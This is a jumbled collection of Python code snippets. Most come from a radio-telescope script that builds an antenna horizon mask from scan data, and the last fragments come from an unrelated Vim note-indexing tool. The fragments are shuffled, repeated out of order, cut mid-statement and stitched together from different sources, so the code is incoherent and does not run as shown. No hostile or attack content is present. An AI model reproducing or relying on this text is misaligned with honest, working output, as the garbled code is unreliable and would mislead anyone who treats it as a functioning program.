remove_rfi(d,width=3,sigma=5,axis=1):", "from a set of data files.') parser.add_option('-a', '--baseline', dest='baseline', type=\"string\", metavar='BASELINE', default='A1A1', help=\"Baseline", "default is first single-dish baseline in file\") parser.add_option('-o', '--output', dest='output', type=\"string\", metavar='OUTPUTFILE', default=None,", "the cut-off for the mask. This is calculated \" \"as the T_sys at", "if ~mask.data[j,i] and ~mask.mask[j,i] : maskr[i] = az,el break np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure() #plt.subplot(1, 1,", "Tempreture Limit to make the cut-off for the mask. This is calculated \"", "scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models) if len(d.freqs) > 1: # Only keep main scans (discard slew", "elevation, temp) np.array(azimuth)<-89 print \"Gridding the data\" print \"data shape = \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print", "is to ensure that the point are well spaced, #this offset is not", "containing noise diode model files\") (opts, args) = parser.parse_args() # Check arguments if", "that the point are well spaced, #this offset is not a problem as", "parser.add_option('-z', '--azshift', dest='azshift', type='float', metavar='AZIMUTH_SHIFT', default=45.0, help=\"Degrees to rotate azimuth window by.\") parser.add_option('--temp-limit',", "target associated with scan, in degrees azimuth, elevation, temp = [], [], []", "d = remove_rfi(d,width=7,sigma=5) d = d.convert_power_to_temperature(min_duration=3, jump_significance=4.0) d = d.select(flagkeep='~nd_on') d = d.select(labelkeep='scan',", "d def main(): # Parse command-line options and arguments parser = optparse.OptionParser(usage='%prog [options]", "for i in range(len(d.scans)): d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return d def main(): # Parse", "files\") (opts, args) = parser.parse_args() # Check arguments if len(args) < 1: raise", "and cal scans) a d = d.select(freqkeep=range(200, 800)) d = remove_rfi(d,width=7,sigma=5) d =", "\"Making the mask\" mask = gridtemp[0] >= opts.temp_limit for grid in gridtemp: mask", "mask = mask * (grid >= opts.temp_limit) maskr = np.zeros((len(np.arange(-90,271,1)),2)) for i,az in", "type=\"string\", metavar='BASELINE', default='A1A1', help=\"Baseline to load (e.g. 'A1A1' for antenna 1), default is", "i,az in enumerate(np.arange(-90,271,1)): print 'at az %f'%(az,) maskr[i] = az,np.max(elevation) for j,el in", "file\") parser.add_option('-s', '--split', dest='split', action=\"store_true\", metavar='SPLIT', default=False, help=\"Whether to split each horizon plot", "(grid >= opts.temp_limit) maskr = np.zeros((len(np.arange(-90,271,1)),2)) for i,az in enumerate(np.arange(-90,271,1)): print 'at az", "d.scans: azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert len(azimuth) == len(elevation) == len(temp), \"sizes don't match\"", "range(len(d.scans)): d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return d def main(): # Parse command-line options and", "# The +361 is to ensure that the point are well spaced, #this", "data file to reduce') # Load data set gridtemp = [] for filename", "= mask * (grid >= opts.temp_limit) maskr = np.zeros((len(np.arange(-90,271,1)),2)) for i,az in enumerate(np.arange(-90,271,1)):", "\" \"as the T_sys at zenith plus the atmospheric noise contrabution at 10", "each horizon plot in half\") parser.add_option('-z', '--azshift', dest='azshift', type='float', metavar='AZIMUTH_SHIFT', default=45.0, help=\"Degrees to", "for sorting out a boundery condition print \"Completed Gridding the data\" print \"Making", "for filename in args: print 'Loading baseline', opts.baseline, 'from data file', filename d", "help=\"Write out intermediate h5 file\") parser.add_option('-s', '--split', dest='split', action=\"store_true\", metavar='SPLIT', default=False, help=\"Whether to", "parser.add_option('--temp-limit', dest='temp_limit', type='float', default=40.0, help=\"The Tempreture Limit to make the cut-off for the", "degrees azimuth, elevation, temp = [], [], [] for s in d.scans: azimuth.extend(rad2deg(s.pointing['az']))", "for %s' % (opts.baseline,)) #plt.xlabel(az_title) #plt.ylabel(el_title) #plt.ylim(0,15) #plt.title(big_title) #plt.show() if __name__ == \"__main__\":", "opts.temp_limit for grid in gridtemp: mask = mask * (grid >= opts.temp_limit) maskr", "\"Gridding the data\" print \"data shape = \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(),", "len(temp), \"sizes don't match\" data = (azimuth, elevation, temp) np.array(azimuth)<-89 print \"Gridding the", "azimuth and elevation angle from (azel) target associated with scan, in degrees azimuth,", "parser.add_option('-o', '--output', dest='output', type=\"string\", metavar='OUTPUTFILE', default=None, help=\"Write out intermediate h5 file\") parser.add_option('-s', '--split',", "Gridding the data\" print \"Making the mask\" mask = gridtemp[0] >= opts.temp_limit for", "#!/usr/bin/python # Plot horizon mask import optparse import numpy as np import matplotlib.pyplot", "help=\"Degrees to rotate azimuth window by.\") parser.add_option('--temp-limit', dest='temp_limit', type='float', default=40.0, help=\"The Tempreture Limit", "Extract azimuth and elevation angle from (azel) target associated with scan, in degrees", "if len(d.freqs) > 1: # Only keep main scans (discard slew and cal", "Parse command-line options and arguments parser = optparse.OptionParser(usage='%prog [options] <data file> [<data file>", "in half\") parser.add_option('-z', '--azshift', dest='azshift', type='float', metavar='AZIMUTH_SHIFT', default=45.0, help=\"Degrees to rotate azimuth window", "dest='baseline', type=\"string\", metavar='BASELINE', default='A1A1', help=\"Baseline to load (e.g. 'A1A1' for antenna 1), default", "'--azshift', dest='azshift', type='float', metavar='AZIMUTH_SHIFT', default=45.0, help=\"Degrees to rotate azimuth window by.\") parser.add_option('--temp-limit', dest='temp_limit',", "scans (discard slew and cal scans) a d = d.select(freqkeep=range(200, 800)) d =", "np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1))) # The +361 is to", "file to reduce') # Load data set gridtemp = [] for filename in", "< 1: raise RuntimeError('Please specify the data file to reduce') # Load data", "import matplotlib.mlab as mlab import scape from katpoint import rad2deg def remove_rfi(d,width=3,sigma=5,axis=1): for", "#plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title = ('Azimuth (deg)', 'Elevation (deg)', 'Mask for %s' % (opts.baseline,)) #plt.xlabel(az_title)", "model files\") (opts, args) = parser.parse_args() # Check arguments if len(args) < 1:", "azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert len(azimuth) == len(elevation) == len(temp), \"sizes don't match\" data", "= remove_rfi(d,width=7,sigma=5) d = d.convert_power_to_temperature(min_duration=3, jump_significance=4.0) d = d.select(flagkeep='~nd_on') d = d.select(labelkeep='scan', copy=False)", "channels into one band d.average() # Extract azimuth and elevation angle from (azel)", "enumerate(np.arange(4,16,0.1)): if ~mask.data[j,i] and ~mask.mask[j,i] : maskr[i] = az,el break np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure() #plt.subplot(1,", "as plt import matplotlib.mlab as mlab import scape from katpoint import rad2deg def", "'Elevation (deg)', 'Mask for %s' % (opts.baseline,)) #plt.xlabel(az_title) #plt.ylabel(el_title) #plt.ylim(0,15) #plt.title(big_title) #plt.show() if", "'--output', dest='output', type=\"string\", metavar='OUTPUTFILE', default=None, help=\"Write out intermediate h5 file\") parser.add_option('-s', '--split', dest='split',", "noise diode model files\") (opts, args) = parser.parse_args() # Check arguments if len(args)", "help=\"The Tempreture Limit to make the cut-off for the mask. This is calculated", "and ~mask.mask[j,i] : maskr[i] = az,el break np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure() #plt.subplot(1, 1, 1) #plt.plot(maskr[1:,0],maskr[1:,1])", "The +361 is to ensure that the point are well spaced, #this offset", "data\" print \"data shape = \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(),", "in file\") parser.add_option('-o', '--output', dest='output', type=\"string\", metavar='OUTPUTFILE', default=None, help=\"Write out intermediate h5 file\")", "h5 file\") parser.add_option('-s', '--split', dest='split', action=\"store_true\", metavar='SPLIT', default=False, help=\"Whether to split each horizon", "specify the data file to reduce') # Load data set gridtemp = []", "arguments parser = optparse.OptionParser(usage='%prog [options] <data file> [<data file> ...]', description='Display a horizon", "default=40.0, help=\"The Tempreture Limit to make the cut-off for the mask. This is", "noise contrabution at 10 degrees\" \"elevation as per R.T. 199 .\") parser.add_option(\"-n\", \"--nd-models\",", "d = d.select(freqkeep=range(200, 800)) d = remove_rfi(d,width=7,sigma=5) d = d.convert_power_to_temperature(min_duration=3, jump_significance=4.0) d =", "Average all frequency channels into one band d.average() # Extract azimuth and elevation", "= ('Azimuth (deg)', 'Elevation (deg)', 'Mask for %s' % (opts.baseline,)) #plt.xlabel(az_title) #plt.ylabel(el_title) #plt.ylim(0,15)", "= optparse.OptionParser(usage='%prog [options] <data file> [<data file> ...]', description='Display a horizon mask from", "rotate azimuth window by.\") parser.add_option('--temp-limit', dest='temp_limit', type='float', default=40.0, help=\"The Tempreture Limit to make", "the mask\" mask = gridtemp[0] >= opts.temp_limit for grid in gridtemp: mask =", "temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert len(azimuth) == len(elevation) == len(temp), \"sizes don't match\" data = (azimuth,", "cut-off for the mask. This is calculated \" \"as the T_sys at zenith", "default=False, help=\"Whether to split each horizon plot in half\") parser.add_option('-z', '--azshift', dest='azshift', type='float',", "RuntimeError('Please specify the data file to reduce') # Load data set gridtemp =", "match\" data = (azimuth, elevation, temp) np.array(azimuth)<-89 print \"Gridding the data\" print \"data", "type='float', default=40.0, help=\"The Tempreture Limit to make the cut-off for the mask. This", "args: print 'Loading baseline', opts.baseline, 'from data file', filename d = scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models)", "don't match\" data = (azimuth, elevation, temp) np.array(azimuth)<-89 print \"Gridding the data\" print", "main(): # Parse command-line options and arguments parser = optparse.OptionParser(usage='%prog [options] <data file>", "help=\"Baseline to load (e.g. 'A1A1' for antenna 1), default is first single-dish baseline", "elevation, temp = [], [], [] for s in d.scans: azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0])))", "a d = d.select(freqkeep=range(200, 800)) d = remove_rfi(d,width=7,sigma=5) d = d.convert_power_to_temperature(min_duration=3, jump_significance=4.0) d", "print \"Making the mask\" mask = gridtemp[0] >= opts.temp_limit for grid in gridtemp:", "shape = \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1))) #", "'A1A1' for antenna 1), default is first single-dish baseline in file\") parser.add_option('-o', '--output',", "optparse.OptionParser(usage='%prog [options] <data file> [<data file> ...]', description='Display a horizon mask from a", "default=None, help=\"Write out intermediate h5 file\") parser.add_option('-s', '--split', dest='split', action=\"store_true\", metavar='SPLIT', default=False, help=\"Whether", "print 'Loading baseline', opts.baseline, 'from data file', filename d = scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models) if", "half\") parser.add_option('-z', '--azshift', dest='azshift', type='float', metavar='AZIMUTH_SHIFT', default=45.0, help=\"Degrees to rotate azimuth window by.\")", "help=\"Whether to split each horizon plot in half\") parser.add_option('-z', '--azshift', dest='azshift', type='float', metavar='AZIMUTH_SHIFT',", "<data file> [<data file> ...]', description='Display a horizon mask from a set of", "the data\" print \"Making the mask\" mask = gridtemp[0] >= opts.temp_limit for grid", "scape from katpoint import rad2deg def remove_rfi(d,width=3,sigma=5,axis=1): for i in range(len(d.scans)): d.scans[i].data =", "def remove_rfi(d,width=3,sigma=5,axis=1): for i in range(len(d.scans)): d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return d def main():", "as mlab import scape from katpoint import rad2deg def remove_rfi(d,width=3,sigma=5,axis=1): for i in", "copy=False) # Average all frequency channels into one band d.average() # Extract azimuth", "np.arange(-90,271,1), np.arange(4,16,0.1))) # The +361 is to ensure that the point are well", "R.T. 199 .\") parser.add_option(\"-n\", \"--nd-models\", help=\"Name of optional directory containing noise diode model", "199 .\") parser.add_option(\"-n\", \"--nd-models\", help=\"Name of optional directory containing noise diode model files\")", "keep main scans (discard slew and cal scans) a d = d.select(freqkeep=range(200, 800))", "print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1))) # The +361 is to ensure", "baseline=opts.baseline,nd_models=opts.nd_models) if len(d.freqs) > 1: # Only keep main scans (discard slew and", "[options] <data file> [<data file> ...]', description='Display a horizon mask from a set", "data files.') parser.add_option('-a', '--baseline', dest='baseline', type=\"string\", metavar='BASELINE', default='A1A1', help=\"Baseline to load (e.g. 'A1A1'", "data file', filename d = scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models) if len(d.freqs) > 1: # Only", "'Mask for %s' % (opts.baseline,)) #plt.xlabel(az_title) #plt.ylabel(el_title) #plt.ylim(0,15) #plt.title(big_title) #plt.show() if __name__ ==", "return d def main(): # Parse command-line options and arguments parser = optparse.OptionParser(usage='%prog", "matplotlib.pyplot as plt import matplotlib.mlab as mlab import scape from katpoint import rad2deg", "gridtemp[0] >= opts.temp_limit for grid in gridtemp: mask = mask * (grid >=", "Load data set gridtemp = [] for filename in args: print 'Loading baseline',", "file> [<data file> ...]', description='Display a horizon mask from a set of data", "offset is not a problem as it is just for sorting out a", "metavar='BASELINE', default='A1A1', help=\"Baseline to load (e.g. 'A1A1' for antenna 1), default is first", "scan, in degrees azimuth, elevation, temp = [], [], [] for s in", "make the cut-off for the mask. This is calculated \" \"as the T_sys", "the data file to reduce') # Load data set gridtemp = [] for", "and arguments parser = optparse.OptionParser(usage='%prog [options] <data file> [<data file> ...]', description='Display a", "~mask.mask[j,i] : maskr[i] = az,el break np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure() #plt.subplot(1, 1, 1) #plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title", "a problem as it is just for sorting out a boundery condition print", ": maskr[i] = az,el break np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure() #plt.subplot(1, 1, 1) #plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title =", "parser.parse_args() # Check arguments if len(args) < 1: raise RuntimeError('Please specify the data", "well spaced, #this offset is not a problem as it is just for", "print \"data shape = \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1),", "a boundery condition print \"Completed Gridding the data\" print \"Making the mask\" mask", "grid in gridtemp: mask = mask * (grid >= opts.temp_limit) maskr = np.zeros((len(np.arange(-90,271,1)),2))", "[<data file> ...]', description='Display a horizon mask from a set of data files.')", "gridtemp = [] for filename in args: print 'Loading baseline', opts.baseline, 'from data", "to make the cut-off for the mask. This is calculated \" \"as the", "metavar='AZIMUTH_SHIFT', default=45.0, help=\"Degrees to rotate azimuth window by.\") parser.add_option('--temp-limit', dest='temp_limit', type='float', default=40.0, help=\"The", "to load (e.g. 'A1A1' for antenna 1), default is first single-dish baseline in", "= parser.parse_args() # Check arguments if len(args) < 1: raise RuntimeError('Please specify the", "filename in args: print 'Loading baseline', opts.baseline, 'from data file', filename d =", "d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return d def main(): # Parse command-line options and arguments", "\"--nd-models\", help=\"Name of optional directory containing noise diode model files\") (opts, args) =", "j,el in enumerate(np.arange(4,16,0.1)): if ~mask.data[j,i] and ~mask.mask[j,i] : maskr[i] = az,el break np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:])", "maskr[i] = az,el break np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure() #plt.subplot(1, 1, 1) #plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title = ('Azimuth", "the T_sys at zenith plus the atmospheric noise contrabution at 10 degrees\" \"elevation", "import rad2deg def remove_rfi(d,width=3,sigma=5,axis=1): for i in range(len(d.scans)): d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return d", "arguments if len(args) < 1: raise RuntimeError('Please specify the data file to reduce')", "mask from a set of data files.') parser.add_option('-a', '--baseline', dest='baseline', type=\"string\", metavar='BASELINE', default='A1A1',", "for grid in gridtemp: mask = mask * (grid >= opts.temp_limit) maskr =", "maskr[i] = az,np.max(elevation) for j,el in enumerate(np.arange(4,16,0.1)): if ~mask.data[j,i] and ~mask.mask[j,i] : maskr[i]", "800)) d = remove_rfi(d,width=7,sigma=5) d = d.convert_power_to_temperature(min_duration=3, jump_significance=4.0) d = d.select(flagkeep='~nd_on') d =", "files.') parser.add_option('-a', '--baseline', dest='baseline', type=\"string\", metavar='BASELINE', default='A1A1', help=\"Baseline to load (e.g. 'A1A1' for", "i in range(len(d.scans)): d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return d def main(): # Parse command-line", "d.select(flagkeep='~nd_on') d = d.select(labelkeep='scan', copy=False) # Average all frequency channels into one band", "= d.select(freqkeep=range(200, 800)) d = remove_rfi(d,width=7,sigma=5) d = d.convert_power_to_temperature(min_duration=3, jump_significance=4.0) d = d.select(flagkeep='~nd_on')", "metavar='SPLIT', default=False, help=\"Whether to split each horizon plot in half\") parser.add_option('-z', '--azshift', dest='azshift',", "np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1))) # The +361 is to ensure that", "#this offset is not a problem as it is just for sorting out", "# Check arguments if len(args) < 1: raise RuntimeError('Please specify the data file", "# Parse command-line options and arguments parser = optparse.OptionParser(usage='%prog [options] <data file> [<data", "in gridtemp: mask = mask * (grid >= opts.temp_limit) maskr = np.zeros((len(np.arange(-90,271,1)),2)) for", "(deg)', 'Elevation (deg)', 'Mask for %s' % (opts.baseline,)) #plt.xlabel(az_title) #plt.ylabel(el_title) #plt.ylim(0,15) #plt.title(big_title) #plt.show()", "in enumerate(np.arange(-90,271,1)): print 'at az %f'%(az,) maskr[i] = az,np.max(elevation) for j,el in enumerate(np.arange(4,16,0.1)):", "metavar='OUTPUTFILE', default=None, help=\"Write out intermediate h5 file\") parser.add_option('-s', '--split', dest='split', action=\"store_true\", metavar='SPLIT', default=False,", "file\") parser.add_option('-o', '--output', dest='output', type=\"string\", metavar='OUTPUTFILE', default=None, help=\"Write out intermediate h5 file\") parser.add_option('-s',", "plot in half\") parser.add_option('-z', '--azshift', dest='azshift', type='float', metavar='AZIMUTH_SHIFT', default=45.0, help=\"Degrees to rotate azimuth", "zenith plus the atmospheric noise contrabution at 10 degrees\" \"elevation as per R.T.", "for the mask. This is calculated \" \"as the T_sys at zenith plus", "len(args) < 1: raise RuntimeError('Please specify the data file to reduce') # Load", "== len(elevation) == len(temp), \"sizes don't match\" data = (azimuth, elevation, temp) np.array(azimuth)<-89", "rad2deg def remove_rfi(d,width=3,sigma=5,axis=1): for i in range(len(d.scans)): d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return d def", "'--baseline', dest='baseline', type=\"string\", metavar='BASELINE', default='A1A1', help=\"Baseline to load (e.g. 'A1A1' for antenna 1),", "1), default is first single-dish baseline in file\") parser.add_option('-o', '--output', dest='output', type=\"string\", metavar='OUTPUTFILE',", "in args: print 'Loading baseline', opts.baseline, 'from data file', filename d = scape.DataSet(filename,", "azimuth, elevation, temp = [], [], [] for s in d.scans: azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el']))", "import matplotlib.pyplot as plt import matplotlib.mlab as mlab import scape from katpoint import", "d.select(labelkeep='scan', copy=False) # Average all frequency channels into one band d.average() # Extract", "sorting out a boundery condition print \"Completed Gridding the data\" print \"Making the", "<gh_stars>0 #!/usr/bin/python # Plot horizon mask import optparse import numpy as np import", "first single-dish baseline in file\") parser.add_option('-o', '--output', dest='output', type=\"string\", metavar='OUTPUTFILE', default=None, help=\"Write out", "np.arange(4,16,0.1))) # The +361 is to ensure that the point are well spaced,", "10 degrees\" \"elevation as per R.T. 199 .\") parser.add_option(\"-n\", \"--nd-models\", help=\"Name of optional", "if len(args) < 1: raise RuntimeError('Please specify the data file to reduce') #", "degrees\" \"elevation as per R.T. 199 .\") parser.add_option(\"-n\", \"--nd-models\", help=\"Name of optional directory", "'--split', dest='split', action=\"store_true\", metavar='SPLIT', default=False, help=\"Whether to split each horizon plot in half\")", "the data\" print \"data shape = \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(),", "mask * (grid >= opts.temp_limit) maskr = np.zeros((len(np.arange(-90,271,1)),2)) for i,az in enumerate(np.arange(-90,271,1)): print", "mask. This is calculated \" \"as the T_sys at zenith plus the atmospheric", "out intermediate h5 file\") parser.add_option('-s', '--split', dest='split', action=\"store_true\", metavar='SPLIT', default=False, help=\"Whether to split", "[] for filename in args: print 'Loading baseline', opts.baseline, 'from data file', filename", "baseline', opts.baseline, 'from data file', filename d = scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models) if len(d.freqs) >", "args) = parser.parse_args() # Check arguments if len(args) < 1: raise RuntimeError('Please specify", "import optparse import numpy as np import matplotlib.pyplot as plt import matplotlib.mlab as", "\"data shape = \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1)))", "s in d.scans: azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert len(azimuth) == len(elevation) == len(temp), \"sizes", "scans) a d = d.select(freqkeep=range(200, 800)) d = remove_rfi(d,width=7,sigma=5) d = d.convert_power_to_temperature(min_duration=3, jump_significance=4.0)", "diode model files\") (opts, args) = parser.parse_args() # Check arguments if len(args) <", ".\") parser.add_option(\"-n\", \"--nd-models\", help=\"Name of optional directory containing noise diode model files\") (opts,", "window by.\") parser.add_option('--temp-limit', dest='temp_limit', type='float', default=40.0, help=\"The Tempreture Limit to make the cut-off", "= az,el break np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure() #plt.subplot(1, 1, 1) #plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title = ('Azimuth (deg)',", "opts.temp_limit) maskr = np.zeros((len(np.arange(-90,271,1)),2)) for i,az in enumerate(np.arange(-90,271,1)): print 'at az %f'%(az,) maskr[i]", "a horizon mask from a set of data files.') parser.add_option('-a', '--baseline', dest='baseline', type=\"string\",", "d.average() # Extract azimuth and elevation angle from (azel) target associated with scan,", "#plt.subplot(1, 1, 1) #plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title = ('Azimuth (deg)', 'Elevation (deg)', 'Mask for %s'", "at 10 degrees\" \"elevation as per R.T. 199 .\") parser.add_option(\"-n\", \"--nd-models\", help=\"Name of", "1: # Only keep main scans (discard slew and cal scans) a d", "into one band d.average() # Extract azimuth and elevation angle from (azel) target", "ensure that the point are well spaced, #this offset is not a problem", "\"as the T_sys at zenith plus the atmospheric noise contrabution at 10 degrees\"", "slew and cal scans) a d = d.select(freqkeep=range(200, 800)) d = remove_rfi(d,width=7,sigma=5) d", "as per R.T. 199 .\") parser.add_option(\"-n\", \"--nd-models\", help=\"Name of optional directory containing noise", "1) #plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title = ('Azimuth (deg)', 'Elevation (deg)', 'Mask for %s' % (opts.baseline,))", "scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return d def main(): # Parse command-line options and arguments parser =", "[], [] for s in d.scans: azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert len(azimuth) == len(elevation)", "(azel) target associated with scan, in degrees azimuth, elevation, temp = [], [],", "spaced, #this offset is not a problem as it is just for sorting", "boundery condition print \"Completed Gridding the data\" print \"Making the mask\" mask =", "d.select(freqkeep=range(200, 800)) d = remove_rfi(d,width=7,sigma=5) d = d.convert_power_to_temperature(min_duration=3, jump_significance=4.0) d = d.select(flagkeep='~nd_on') d", "condition print \"Completed Gridding the data\" print \"Making the mask\" mask = gridtemp[0]", "horizon mask from a set of data files.') parser.add_option('-a', '--baseline', dest='baseline', type=\"string\", metavar='BASELINE',", "np.array(azimuth)<-89 print \"Gridding the data\" print \"data shape = \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print", "d = d.select(labelkeep='scan', copy=False) # Average all frequency channels into one band d.average()" ]
[ "[(k, self.normalize(k)) for k in self.index['keywords']] for usr_kw in keywords: submatches = set()", "return os.path.abspath(os.path.expanduser(path)) def usage(self): print(__doc__.strip()) class Timer: \"\"\"Easy to use timer to keep", "updated automatically during each invocation of the program. Valid options include: -i, --ignore-case", "[ 'ignore-case', 'list=', 'database=', 'notes=', 'encoding=', 'verbose', 'help', ]) except getopt.GetoptError as error:", "to index. for filename, last_modified in notes_on_disk.items(): self.add_note(filename, last_modified) logger.info(\"Updated index in %s\",", "command line option defaults. self.database_file = '~/.vim/misc/notes/index.pickle' self.user_directories = ['~/.vim/misc/notes/user/'] self.character_encoding = 'UTF-8'", "in ('-i', '--ignore-case'): self.case_sensitive = False logger.debug(\"Disabling case sensitivity\") elif opt in ('-l',", "user's notes. It has two advantages over just # using Vim's internal :vimgrep", "searching index in %s\", global_timer) def parse_args(self, argv): \"\"\"Parse the command line arguments.\"\"\"", "def tokenize(self, text): \"\"\"Tokenize a string into a list of normalized, unique keywords.\"\"\"", "# TODO: Only save if necessary. self.save_index(INDEX_FILE_PATH, index) def add_note_to_index(self, index, filename, last_modified):", "self.delete_note(filename) self.add_note(filename, last_modified_on_disk) # Already checked this note, we can forget about it.", "the notes directory.\"\"\" user_directories = self.notes_directories index = self.index # First we find", "last_count = 0 for directory in self.user_directories: print('Scanning', directory) for root, dirs, files", "in decorated[:limit]] print(selection) print(self.encode(u'\\n'.join(selection))) def tokenize(self, text): \"\"\"Tokenize a string into a list", "notes (can be repeated) -e, --encoding=NAME set character encoding of notes -v, --verbose", "Standard library modules. import codecs import fnmatch import getopt import logging import os", "if any(fnmatch.fnmatch(filename, pattern) for 